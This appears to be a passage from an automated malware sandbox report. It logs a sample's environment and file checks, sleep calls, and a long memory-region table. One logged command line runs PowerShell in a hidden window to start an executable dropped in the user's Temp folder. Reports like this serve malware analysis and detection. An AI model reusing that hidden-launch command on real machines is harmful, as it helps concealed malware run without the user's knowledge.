Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 2
Fn
File Get Info filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\System32\Wbem, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\, type = file_attributes True 1
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL True 2
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Process Create process_name = "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe, os_pid = 0x5e0, show_window = SW_HIDE True 1
Fn
Thread 0xaa8
3 0
»
Category Operation Information Success Count Logfile
System Sleep duration = -1 (infinite) True 1
Fn
System Sleep duration = 10000 milliseconds (10.000 seconds) True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Process #4: powershell.exe
800 0
»
Information Value
ID #4
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:04:46
OS Process Information
»
Information Value
PID 0x5e0
Parent PID 0x11a0 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 108C
0x 10A0
0x 10C8
0x 10E0
0x 1170
0x D08
0x 938
0x 13F0
0x ACC
0x 1244
0x 734
0x C5C
0x 11C4
0x 10D4
0x C30
0x 12FC
0x 12F4
0x 11CC
0x ADC
0x 1198
0x AB4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x00000052e7290000 0x52e7290000 0x52e730ffff Private Memory Readable, Writable True False False -
private_0x00000052e7310000 0x52e7310000 0x52e738ffff Private Memory Readable, Writable True False False -
private_0x00000052e7390000 0x52e7390000 0x52e73cffff Private Memory Readable, Writable True False False -
private_0x00000052e7400000 0x52e7400000 0x52e75fffff Private Memory Readable, Writable True False False -
private_0x00000052e7600000 0x52e7600000 0x52e767ffff Private Memory Readable, Writable True False False -
private_0x00000052e7680000 0x52e7680000 0x52e76fffff Private Memory Readable, Writable True False False -
private_0x00000052e7700000 0x52e7700000 0x52e777ffff Private Memory Readable, Writable True False False -
private_0x00000052e7780000 0x52e7780000 0x52e77fffff Private Memory Readable, Writable True False False -
private_0x00000052e7800000 0x52e7800000 0x52e787ffff Private Memory Readable, Writable True False False -
private_0x00000052e7880000 0x52e7880000 0x52e78fffff Private Memory Readable, Writable True False False -
private_0x00000052e7900000 0x52e7900000 0x52e797ffff Private Memory Readable, Writable True False False -
private_0x00000052e7980000 0x52e7980000 0x52e79fffff Private Memory Readable, Writable True False False -
private_0x00000052e7a00000 0x52e7a00000 0x52e7a7ffff Private Memory Readable, Writable True False False -
private_0x00000052e7a80000 0x52e7a80000 0x52e7afffff Private Memory Readable, Writable True False False -
private_0x00000052e7b00000 0x52e7b00000 0x52e7b7ffff Private Memory Readable, Writable True False False -
private_0x00000052e7b80000 0x52e7b80000 0x52e7bbffff Private Memory Readable, Writable True False False -
private_0x00000194c5350000 0x194c5350000 0x194c536ffff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5350000 0x194c5350000 0x194c535ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000194c5360000 0x194c5360000 0x194c5366fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5370000 0x194c5370000 0x194c5387fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5390000 0x194c5390000 0x194c5393fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c53a0000 0x194c53a0000 0x194c53a0fff Pagefile Backed Memory Readable True False False -
private_0x00000194c53b0000 0x194c53b0000 0x194c53b0fff Private Memory Readable, Writable True False False -
locale.nls 0x194c53c0000 0x194c5484fff Memory Mapped File Readable False False False -
private_0x00000194c5490000 0x194c5490000 0x194c5496fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c54a0000 0x194c54a0000 0x194c54a1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c54b0000 0x194c54b0000 0x194c54b0fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x194c54c0000 0x194c54c2fff Memory Mapped File Readable False False False -
private_0x00000194c54d0000 0x194c54d0000 0x194c54d0fff Private Memory Readable, Writable True False False -
private_0x00000194c54e0000 0x194c54e0000 0x194c54e0fff Private Memory Readable, Writable True False False -
private_0x00000194c54f0000 0x194c54f0000 0x194c54f6fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5500000 0x194c5500000 0x194c5500fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000194c5510000 0x194c5510000 0x194c551ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000194c5520000 0x194c5520000 0x194c561ffff Private Memory Readable, Writable True False False -
private_0x00000194c5620000 0x194c5620000 0x194c562ffff Private Memory Readable, Writable True False False -
private_0x00000194c5630000 0x194c5630000 0x194c5630fff Private Memory Readable, Writable True False False -
private_0x00000194c5640000 0x194c5640000 0x194c5640fff Private Memory Readable, Writable True False False -
private_0x00000194c5650000 0x194c5650000 0x194c565ffff Private Memory Readable, Writable True False False -
private_0x00000194c5660000 0x194c5660000 0x194c56cffff Private Memory Readable, Writable True False False -
private_0x00000194c56d0000 0x194c56d0000 0x194c56dffff Private Memory Readable, Writable True False False -
private_0x00000194c56e0000 0x194c56e0000 0x194c56effff Private Memory Readable, Writable True False False -
pagefile_0x00000194c56f0000 0x194c56f0000 0x194c58f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5900000 0x194c5900000 0x194c5a80fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5a90000 0x194c5a90000 0x194c6e8ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c6e90000 0x194c6e90000 0x194c6e90fff Pagefile Backed Memory Readable True False False -
winnlsres.dll